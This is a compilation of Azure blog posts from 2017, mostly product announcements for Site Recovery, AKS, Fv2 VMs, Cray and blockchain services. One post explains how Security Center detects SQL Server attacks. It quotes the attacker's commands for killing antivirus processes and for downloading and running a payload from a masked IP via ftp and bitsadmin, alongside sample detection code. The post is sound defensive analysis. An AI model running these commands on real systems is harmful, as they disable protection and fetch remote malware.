One-click replication for Azure Virtual Machines with Azure Site Recovery

We are happy to announce that Azure Site Recovery (ASR) is now built into the virtual machine experience so that you can set up replication for your Azure virtual machines in one click. Combined with ASR’s one-click failover capabilities, it’s simpler than ever before to set up replication and test a disaster recovery scenario.

Using the one-click replication feature, now in public preview, is very simple. Just browse to your VM, select Disaster recovery, select the target region of your choice, review the settings and click Enable replication. That’s it – disaster recovery for your VM is configured. The target resource group, availability set, virtual network and storage accounts are auto-created based on your source VM configuration. You also have the flexibility to pick custom target settings. You can refer to the animation below for the flow.

If you have applications running on Azure IaaS virtual machines, those applications still have to meet compliance requirements. While the Azure platform already has built-in protection for localized hardware failures, you still need to safeguard your applications from major incidents. This includes catastrophic events such as hurricanes and earthquakes, or software glitches causing application downtime. Using Azure Site Recovery, you can have peace of mind knowing your business-critical applications running on Azure VMs are covered, without the expense of secondary infrastructure. Disaster recovery between Azure regions is available in all Azure regions where ASR is available. Get started with Azure Site Recovery today.

Related links and additional content

Get started by configuring disaster recovery for Azure VMs
Learn more about the supported configurations for replicating Azure VMs
Need help? Reach out to the Azure Site Recovery forum for support
Tell us how we can improve Azure Site Recovery by contributing new ideas and voting up existing ones

Source: Azure

Azure powers the industrial Internet

We know that every business is different, but the cloud is foundational to digital transformation. We’re proud that Azure has been at the forefront of helping companies across industries transform. Today, Satya Nadella is sharing the stage with GE’s CEO at Minds + Machines to talk about GE’s transformation and how we’re partnering to help customers around the world accelerate their own transformation.

As we think about the industrial companies of the future, we know there is a huge opportunity to gain insights that will have true business impact. Connecting industrial assets to the cloud enables the creation of a digital feedback loop that helps customers to unlock actionable intelligence from machinery and equipment like wind turbines, jet engines and refrigeration systems.

The industrial internet is changing the way businesses fundamentally operate. We believe that IoT is not a technology revolution, but a business revolution enabled by technology. Think about the advantages of being able to predict when equipment failure might happen and getting in front of it versus dealing with the consequences. It directly impacts the bottom line if you can avoid unplanned downtime, extend equipment life, increase production value and generate higher yields.

At Microsoft, we believe in customer choice and enabling a rich ecosystem of offerings for our customers. In that spirit, we’re pleased to announce that starting November 30, GE’s Predix platform will be available on Azure – the leading cloud for enterprises. This enables Predix to take advantage of Azure’s differentiated capabilities, from enterprise-grade security, to more regions worldwide, to a larger compliance portfolio, to national clouds for the highest level of data sovereignty, to industry leading hybrid capabilities – and more.

We’re committed to helping businesses of all sizes realize their full potential. Customers interested in learning more about our partnership with GE can contact Erik Sevenants, director of partner development at Microsoft.
Source: Azure

How Azure Security Center automates the detection of cyber attacks

Earlier this year, Greg Cottingham wrote a great article breaking down an example of an attack against SQL Server detected by Azure Security Center. In this post, we'll go into more detail on how Security Center analyzes data at scale to detect these types of attacks, and how the output from these approaches can be used to pivot to other intrusions that share common techniques.

With attack techniques rapidly evolving, many organizations are struggling to keep pace. This is exacerbated by a scarcity of security talent, and companies can no longer rely solely on detections written by human beings. By baking the intuition of human security analysts inside algorithms, Azure Security Center can automatically adapt to changing attack patterns.

Let’s look at how Security Center uses this approach to detect attacks against SQL Server. Analyzing the processes executed by the MSSQLSERVER account shows that it is very stable under normal circumstances – it performs a fixed set of actions almost all the time. The stability of this account allows us to build a model that detects the anomalous activity that occurs when it is experiencing an attack.

Building a model

Before Security Center can construct a model of this data, it performs some pre-processing to collapse process executions that run out of similar directories. Otherwise, the model would treat these as different processes. It uses a distance function over the process directory to cluster executions, and then aggregates prevalence where a process name is shared. An example of this process can be seen below.

This can be reduced to the single summarized state:

It also manipulates the data to capture hosted executions such as regsvr32.exe and rundll32.exe that may be common in themselves, but can be used to run other files. By treating the file that was run as an execution in its own right, insight is gained into any code that was run by this mechanism.
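To make the pre-processing concrete, here is a minimal sketch of directory-based collapsing. It is an illustration only, not Security Center's actual implementation: the event format, the use of a string-similarity distance, and the 0.25 threshold are all assumptions.

```python
from difflib import SequenceMatcher

def directory_distance(a: str, b: str) -> float:
    """Distance in [0, 1] between two directory paths; 0.0 means identical."""
    return 1.0 - SequenceMatcher(None, a.lower(), b.lower()).ratio()

def collapse_executions(events, threshold=0.25):
    """Collapse (directory, process_name, count) events: executions that share
    a process name and whose directories are within `threshold` of a group's
    representative directory are merged into one summarized state."""
    groups = {}  # (process_name, representative_directory) -> aggregated count
    for directory, name, count in events:
        for gname, gdir in list(groups):
            if gname == name and directory_distance(directory, gdir) <= threshold:
                groups[(gname, gdir)] += count
                break
        else:
            groups[(name, directory)] = count
    return groups
```

With this, two executions of the same binary out of per-session temp directories (for example, paths differing only in a session suffix) reduce to a single summarized state, so the model does not count them as distinct processes.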

With this normalized data, the Azure Security Center detection engine can plot the prevalence of processes executed by MSSQLSERVER in a subscription. Due to the stability of this account, this simple approach produces a robust model of normal behavior by process name and location. A visualization of this model can be seen in the graph below.

Finding anomalies

When an attack surface like SQL Server is targeted, an attacker’s first few actions are highly constrained. They can try various tactics, which all leave a trail of process execution events. In the example below, we show the same model built by security center using data from a subscription at a time it experienced a SQL Server attack. This time, it finds anomalies in the tail of low prevalence executions that contain some interesting data.
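In sketch form, such a prevalence model and its low-prevalence tail might look like the following. This is an illustrative simplification under assumed inputs (bare process names, a fixed prevalence floor); the real model operates on the normalized name-and-location states described earlier.

```python
from collections import Counter

def build_prevalence_model(executions):
    """Estimate how often each process is seen for the MSSQLSERVER account,
    as a fraction of all observed executions."""
    counts = Counter(executions)
    total = sum(counts.values())
    return {proc: n / total for proc, n in counts.items()}

def find_anomalies(model, observed, min_prevalence=0.05):
    """Flag observed executions that are absent from the model or fall below
    the prevalence floor -- the low-prevalence tail where attacks surface."""
    return [p for p in observed if model.get(p, 0.0) < min_prevalence]
```

Under normal load the model is dominated by a handful of high-prevalence processes; during an attack, executions such as taskkill or ntsd land in the tail and are flagged.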

Let's take a deeper look at some of the unusual executions identified by the model:

taskkill /im 360rp.exe /f
taskkill /im 360sd.exe /f
taskkill /im 360rps.exe /f
ntsd -c q -pn 360rp.exe
ntsd -c q -pn 360sd.exe
ntsd -c q -pn 360rps.exe

In the first phase, we see several attempts to disable the anti-virus engine running on the host. The first uses the built-in tool taskkill to end the process. The second uses a debugger, ntsd, attaching to the process it wishes to disrupt with the -pn argument and executing the command 'q' once it has successfully attached to the target. The 'q' command causes the debugger to terminate the target application.

With the anti-virus engine disabled, the attacker is free to download and run its first stage from the internet. It does this in a couple of different ways:

The first is over the FTP protocol. We see the attacker use the echo command to write a series of FTP commands to a file:

echo open xxx.xxx.xxx.xxx>So.2
echo 111>>So.2
echo 000>>So.2
echo get Svn.exe >>So.2
echo bye

The commands are then executed:

ftp -s:So.2

The file is deleted, and the executable is run:

del So.2
Svn.exe

In case this method of downloading the executable fails, the attack falls back to a secondary mechanism of fetching the file, from the same address this time over HTTP:

bitsadmin /transfer n http://xxx.xxx.xxx.xxx:xxxx/Svn.exe c:\Users\Public\Svn.exe

Here we see the attacker downloading the executable file from the internet using the bitsadmin tool.

Using machine learning, Azure Security Center alerts on anomalous activity like this – all without specialist knowledge or human intervention. Here is how one of these alerts looks inside Azure Security Center:

Mining the output

Although this approach is limited to detecting attacks in a very specific scenario, it also acts as a detection factory, automating the discovery of new techniques used by attackers.
 
Let’s look again at the bitsadmin example:
 
bitsadmin /transfer n http://xxx.xxx.xxx.xxx:xxxx/xxx.exe c:\Users\Public\xxx.exe
 
On close inspection, this looks like a general technique that attackers can use to execute a remote file using a built-in capability of the operating system, but it was surfaced to us by an algorithm rather than a security expert.

While the legitimate use of bitsadmin is common, the remote location, job name and the destination directory of the executable are suspicious. This provides the basis for a new detection, specifically targeted at unusual bitsadmin executions, independent of whether or not they are run by the MSSQLSERVER account.
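A heuristic of this kind can be sketched as a simple command-line classifier. This is a hypothetical illustration of the idea, not the detection Security Center actually ships; the staging directories and the specific checks are assumptions.

```python
import re

def suspicious_bitsadmin(cmdline: str) -> bool:
    """Illustrative heuristic: flag bitsadmin transfers that fetch an
    executable from a remote URL, especially into a world-writable
    staging directory."""
    cl = cmdline.lower()
    if "bitsadmin" not in cl or "/transfer" not in cl:
        return False
    has_remote_url = re.search(r"https?://", cl) is not None
    staging_dirs = (r"\users\public", r"\windows\temp", r"\programdata")
    writes_to_staging = any(d in cl for d in staging_dirs)
    drops_executable = cl.rstrip().endswith(".exe")
    return has_remote_url and (writes_to_staging or drops_executable)
```

Legitimate BITS jobs tend to use internal sources and application-specific destinations, so a rule like this keeps the false-positive rate manageable while catching the download-and-execute pattern seen above.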
 
Thus, bitsadmin and other alerts generated by this approach can be mined for suitability as standalone detections. These, in turn, alert customers to other attacks on their subscriptions that share common techniques, even when delivered through a different attack vector.

Summary

By using Azure Security Center, customers with SQL Server deployments automatically benefit from this approach to detection. Because it is anomaly based, it adapts to changing tactics, alerting on new attacks without involvement from a human expert. The new techniques captured by this approach generate detection opportunities that feed back into protecting all Security Center customers.

For more information on the types of attacks mentioned in this article and how to mitigate them, see the blog, "How Azure Security Center helps reveal a Cyberattack."

To learn more about detection in Azure Security Center, see the following:

Azure Security Center’s detection capabilities
Managing and responding to security alerts in Azure Security Center

Source: Azure

Blk.io brings an ERC-20 token service using Quorum to Azure

blk.io has been hard at work on products that help enterprises build applications powered by blockchain. This includes driving the web3j group of projects. blk.io has also built a service for creating and managing ERC-20 tokens on top of Quorum, leveraging web3j, a RESTful API, and Spring Boot.

web3j – connecting Java applications to the Ethereum blockchain

web3j is the core library of the web3j group of projects, which provide open source libraries for working with Ethereum blockchains on the JVM. In addition to Ethereum, there are integrations for Quorum, and the widely-used Spring Boot framework for production-grade applications.

blk.io sponsors the ongoing development of web3j and other related projects. It is working with a number of financial firms on the development of their blockchain applications and provides both support and training for enterprises wishing to work with Ethereum and Quorum. To get started with web3j, check out the official documentation.

ERC-20 token service

The service provides a well-documented API for interacting with it, making it trivial to build a solution using the industry standard for digital tokens.

As users continue to build systems powered by enterprise-class blockchains such as Quorum, services such as this token service help to speed up delivery of these next-generation applications. To get started using this service, create an instance from the Azure Marketplace. A detailed walkthrough is available to help users get started with the offering.
Source: Azure

Introducing AKS (managed Kubernetes) and Azure Container Registry improvements

Today, we are proud to announce the preview of AKS (Azure Container Service), our new managed Kubernetes service. We have seen customers fall in love with our current Kubernetes support on Azure Container Service, currently known as ACS, which has grown 300% in the last six months. Now with the preview of AKS, we are making it even easier to manage and operate your Kubernetes environments, all without sacrificing portability. This new service features an Azure-hosted control plane, automated upgrades, self-healing, easy scaling, and a simple user experience for both developers and cluster operators. With AKS, customers get the benefit of open source Kubernetes without complexity and operational overhead.

Notice in the demo below how easy it is to provision a new AKS cluster, upgrade the cluster from Kubernetes 1.7.7 to 1.8.1, and scale the cluster from 3 to 10 nodes.

To help you get started, AKS is free. You only pay for the VMs that add value to your business. Unlike other cloud providers who charge an hourly rate for the management infrastructure, with AKS you will pay nothing for the management of your Kubernetes cluster, ever. After all, the cloud should be about only paying for what you consume. View a video on why AKS is right for you and try AKS for free today. 

While Azure Container Service has been available since 2015 with support for multiple container orchestrators, these new features and innovative pricing are focused on Kubernetes, which has emerged as the open source standard for container orchestration. Kubernetes’ unique community involvement and portability make it an ideal orchestrator to standardize on. This comes as no surprise to Microsoft. Brendan Burns, co-creator of Kubernetes, now leads Azure’s container efforts. Earlier this year Microsoft acquired Deis, a company at the center of Kubernetes innovation. More than ever, Microsoft is contributing upstream to Kubernetes and developing innovative software like Draft to make Kubernetes easier to use for developers. Given this deepening focus on Kubernetes, we will refer to our managed Kubernetes service as AKS.

For example, here is how you can easily create a new Kubernetes cluster using the Azure CLI:

az aks create -n myCluster -g myResourceGroup

We also see continued interest in other orchestrator deployments such as Docker Enterprise and Mesosphere DC/OS from customers including MetLife and ESRI. As a result, we will continue to support the existing ACS deployment engine in Azure for simple creation of popular open source container solutions. To address the needs of our mutual customers, we are continuing to work with Docker and Mesosphere to offer enhanced integration of their enterprise offers in our Azure Marketplace. The Azure Marketplace provides the same easy deployment as ACS, while adding easy in-place upgrades to enterprise editions, which offer value-added commercial features and 24×7 support.

In addition to the launch of AKS, we’re announcing today the general availability of managed SKUs of Azure Container Registry (ACR). ACR provides a private registry that scales to your needs through three new sizes. To provide scale across the global footprint of Azure, we’re also announcing the preview of ACR geo-replication. With the click of a map, customers can now manage a single registry replicated across any number of regions. Any push or pull of a container image to ACR will be routed to the closest registry. ACR geo-replication enables customers to manage their global deployments as one entity. Geo-replication is a first-of-its-kind feature catering to customers who operate at global scale, further separating Azure from competitors with much smaller global footprints. View a video showing how you can leverage geo-replication and deploy to regions as images arrive.

This is an exciting moment for Azure and our customers. We look forward to both customers and partners building atop our new managed Kubernetes service.
Source: Azure

Truffle 4.0 beta 2 now available on Azure

Truffle has created a toolset used by developers building decentralized applications on the Ethereum blockchain. While other tools exist, Truffle focuses on the developer experience and the unique needs of developing on a blockchain that are not present in traditional software development. Truffle delivers a framework for managing the lifecycle of the development and deployment process, and the product’s evolution is reflected in new features such as those listed below.

We are excited to announce that, in addition to the latest stable version of Truffle, the Truffle 4.0 beta 2 release is now available in the Azure Marketplace. The drive to improve the developer experience is central to tools such as Truffle. The beta offers a significant upgrade, and this new offering showcases the features being developed as part of the framework, including:

No need to run testrpc for faster development cycles
Step through debugging of transactions in Smart Contracts
The ability to have multiple concurrent development sessions active
Logging in the new development blockchain (without the need to use testrpc)
New Solidity compiler 0.4.17
Migration and deployment dry runs to allow testing upgrades before actual deployment

All of the details can be found on GitHub. Also, join in the conversation on the Truffle Gitter channel as well!

Along with this, Truffle has moved the application build process to a more modular model. This has been in place since version 3.0, and example "boxes", or boilerplates, are available to help users bootstrap the application development process. A list of these boxes can be found on the Truffle website.

Truffle continues to provide a development environment that makes building decentralized applications as easy as web development. To get started with the beta, create an instance in Azure from the Marketplace.
Source: Azure

Last week in Azure: Cloud Service Map, Azure Red Shirt Dev Tour, & more

Here are the five things to know from last week in Azure:

1. Translating AWS to Azure with the Cloud Service Map

"And you know what they call a Quarter Pounder with Cheese in Paris?"

One of the challenges of living in a multi-cloud world is understanding all the little differences among them. Last week we published the Cloud Service Map for AWS and Azure, which will help you identify the equivalent services in one cloud when you know what it's called in the other. Of course, there are some services you'll only find in one or the other for which there is no equivalent at this time. Download a PDF of the Cloud Service Map for AWS and Azure. To learn more, see: Cloud Service Map for AWS and Azure Available Now.

2. Azure Red Shirt Dev Tour '17

Last week, Microsoft's cloud chief, Scott Guthrie, toured Chicago, Dallas, Atlanta, Boston, and New York City to write code live and demonstrate how Azure can help you solve some of your most complex developer problems. We live-streamed the full five hours of his final show in New York for online audiences and captured it for on-demand viewing. On the Microsoft Developer site, you can find a list of the demos that Scott did on the tour along with links to help you locate them in the documentation.

3. New Azure Government Capabilities

Azure offers a comprehensive set of compliance offerings to help you comply with national, regional, and industry-specific requirements governing the collection and use of individuals’ data. Our government customers are responsible for the most sensitive data and the most critical applications in the country. Azure Government is the mission-critical cloud, providing more than 7,000 Federal, State, and local customers the exclusivity, highest compliance and security, hybrid flexibility, and commercial-grade innovation they need to better meet citizen expectations.

Last week at Microsoft Government Cloud Forum in Washington D.C., we announced several important advances for Azure Government, including:

Introducing Azure Government Secret – multi-tenant cloud infrastructure and cloud capabilities to U.S. Federal Civilian, Department of Defense, Intelligence Community, and U.S. Government partners working within Secret enclaves.
Blockchain for Azure Government – support for a wide array of our Azure blockchain and distributed ledger marketplace solutions, which automate the deployment and configuration of blockchain infrastructure across multiple organizations, allowing our customers to focus on government transformation and application development.
Unified security management with Azure Security Center – a unified security management and advanced threat protection for hybrid cloud workloads, enabling government agencies to take on evolving security threats.
Expanding High Performance Computing in Azure Government – Azure H-series virtual machines, with InfiniBand and Linux RDMA technology, are designed to deliver cutting-edge performance for complex engineering and scientific workloads such as weather prediction and climate modeling, trajectory modeling, and other memory-intensive projects.
New Virtual Desktop Infrastructure options in the cloud – extend existing Citrix environments and deploy Windows 10 desktops into Azure Government from Citrix Cloud.

To learn more, see: Announcing new Azure Government capabilities for classified mission-critical workloads.

4. New Previews on Azure

Azure Service Bus and Azure Event Hubs Geo-disaster recovery – Azure Service Bus and Azure Event Hubs just released a preview of an upcoming generally available Geo-disaster recovery feature.

Azure Data Factory v2: visual monitoring added – easily monitor Azure Data Factory v2 pipelines without writing a single line of code.

Azure Cosmos DB in Azure Storage Explorer – explore and manage Azure Cosmos DB databases with the same consistent user experiences that make Azure Storage Explorer a powerful developer tool for managing Azure storage.

5. Weekly Azure Shows

Hybrid Storage with Azure File Sync – Klaas Langhout joins Scott Hanselman on Azure Friday to show Azure File Sync for centralizing file services into Azure, which reduces the cost and complexity of managing islands of data while preserving existing app compatibility and performance. In addition, it provides multi-site access to the same data, tiering of less frequently used data off-premises, and integrated backup and rapid restoration.

Azure API Management: New UI & Mocks – Anton Babadjanov joins Scott Hanselman on Azure Friday to discuss the new redesigned administrative UI for API Management. Also, see how it enables a design-first approach with the ability to produce simulated (mocked) API responses.

The Azure Podcast: SQL on Linux – Bob Ward, Principal Architect on the SQL Server Team, talks about the release of SQL Server on Linux, which is available in Azure and on-premises.

Cloud Tech 10 – AWS Cloud Service Map, Bing Custom Search, Cosmos DB and more!

Source: Azure

Transactional replication to Azure SQL Database is now generally available

We are excited to announce that transactional replication to Azure SQL Database is now generally available (GA). This feature allows you to migrate your on-premises SQL Server databases to Azure SQL Databases with minimal downtime.

You can configure your on-premises SQL Server databases that you wish to migrate as publisher and configure your Azure SQL Database as push subscriber to the SQL Server instance. The transactional replication distributor synchronizes data from the publisher to the subscriber. All changes to your data and schema will show up in your Azure SQL Database. Once the synchronization is completed, and you are ready to migrate, change the connection string of your applications to point them to your Azure SQL Database.

You can also use transactional replication to migrate a subset of your source database. The publication that you replicate to Azure SQL Database can be limited to a subset of the tables in the database being replicated. For each table being replicated, you can limit the data to a subset of the rows and/or a subset of the columns.

Please see SQL Server database migration to SQL Database in the cloud for more details.

Transactional replication can also be used to synchronize your data from on-premises SQL Server to Azure SQL Database in one direction. To synchronize data bi-directionally or from Azure SQL Database, see the following document for more options: Sync data across multiple cloud and on-premises databases with SQL Data Sync.
Source: Azure

Fv2 VMs are now available, the fastest VMs on Azure

Today, I’m excited to announce the general availability of our new Fv2 VM family. Azure now offers the fastest Intel® Xeon® Scalable processor, code-named Skylake, in the public cloud. In Azure, we have seen growing demand for massive large-scale computation by customers doing financial modeling, scientific analysis, genomics, geothermal visualization, and deep learning. Our drive to continuously innovate in Azure allows us to offer cost-effective and best-in-class hardware for these world-changing workloads. With the recent announcements of ND, offering the first Tesla P40s in the public cloud, and NCv2, offering Tesla P100s, plus the only cloud with InfiniBand connectivity, Azure enables amazing scale-out, GPU-powered calculations. Now, with Fv2, Azure offers the fastest CPU-powered calculations on the Intel Skylake processor.

These VM sizes are hyper-threaded and run on the Intel® Xeon® Platinum 8168 processor, featuring a base core frequency of 2.7 GHz and a maximum single-core turbo frequency of 3.7 GHz. Intel® AVX-512 instructions, which are new on Intel Scalable Processors, will provide up to a 2X performance boost to vector processing workloads on both single and double precision floating point operations. In other words, they are really fast for any computational workload. The closest cloud competitor offering Skylake currently only offers 2.0 GHz. This makes Azure the best place for computationally-intensive workloads, with the newest and best tools for the job.

The Fv2 VMs will be available in 7 sizes, with the largest size featuring 72 vCPUs and 144 GiB of RAM. These sizes will support Azure premium storage disks by default and will also support accelerated networking capabilities for the highest throughput of any cloud and ultra-low VM to VM latencies. With the best performance to price ratio on Azure, Fv2 VMs are a perfect fit for your compute intensive workloads. 

Here are the details on these new Fv2 VM sizes:

| Size | vCPUs | Memory (GiB) | Local SSD (GiB) | Max cached and local disk IOPS (cache size in GiB) | Max data disks (1,023 GB each) | Max NICs |
| --- | --- | --- | --- | --- | --- | --- |
| Standard_F2s_v2 | 2 | 4 | 16 | 4,000 (32) | 4 | 2 |
| Standard_F4s_v2 | 4 | 8 | 32 | 8,000 (64) | 8 | 2 |
| Standard_F8s_v2 | 8 | 16 | 64 | 16,000 (128) | 16 | 4 |
| Standard_F16s_v2 | 16 | 32 | 128 | 32,000 (256) | 32 | 8 |
| Standard_F32s_v2 | 32 | 64 | 256 | 64,000 (512) | 32 | 8 |
| Standard_F64s_v2 | 64 | 128 | 512 | 128,000 (1,024) | 32 | 8 |
| Standard_F72s_v2 | 72 | 144 | 576 | 144,000 (2,048) | 32 | 8 |

Starting today, these sizes are available in West US 2, West Europe, and East US. Southeast Asia is coming soon. I hope you enjoy these new sizes, and I am excited to see what you will do with them!

See ya around, 
Corey
Source: Azure

Cray Supercomputers are coming to Azure

I’m thrilled to share our new, exclusive partnership with Cray that will provide our customers unprecedented access to supercomputing capabilities in Azure to solve their toughest challenges in climate modeling, precision medicine, energy, manufacturing, and other scientific research.

This announcement is yet another step to help our customers harness the power of HPC and AI in an agile and cost-effective way. At Microsoft, we believe access to Big Computing capabilities in the cloud has the power to transform many businesses and will be at the forefront of breakthrough experimentation and innovation in the decades to come. We’ve already made significant investments to support this vision over the last several years, including industry-leading network performance with InfiniBand, our recent acquisition of Cycle Computing to simplify management of hybrid HPC deployments, and our recent announcements around bringing leading edge GPUs to the public cloud.

Microsoft and Cray are working together to bring customers the right combination of extreme performance, scalability, and elasticity. Customers can get dedicated Cray XC or CS series supercomputers in Azure to run HPC and AI applications alongside their other cloud workloads, directly on the Azure network. The Cray systems integrate easily with Azure Virtual Machines, Azure Data Lake storage, the Microsoft AI platform, and Azure Machine Learning services for rich workflows and collaboration. All of this is provided in the cloud with the most datacenters worldwide, the most compliance certifications, and dedicated regions for government agencies and their partners.

This partnership between Microsoft and Cray uniquely allows customers to run a broad array of hybrid workflows in the cloud, fully supported by experts in enterprise cloud and HPC.

To learn more about this offering, please see our press release or visit the Cray website.
Source: Azure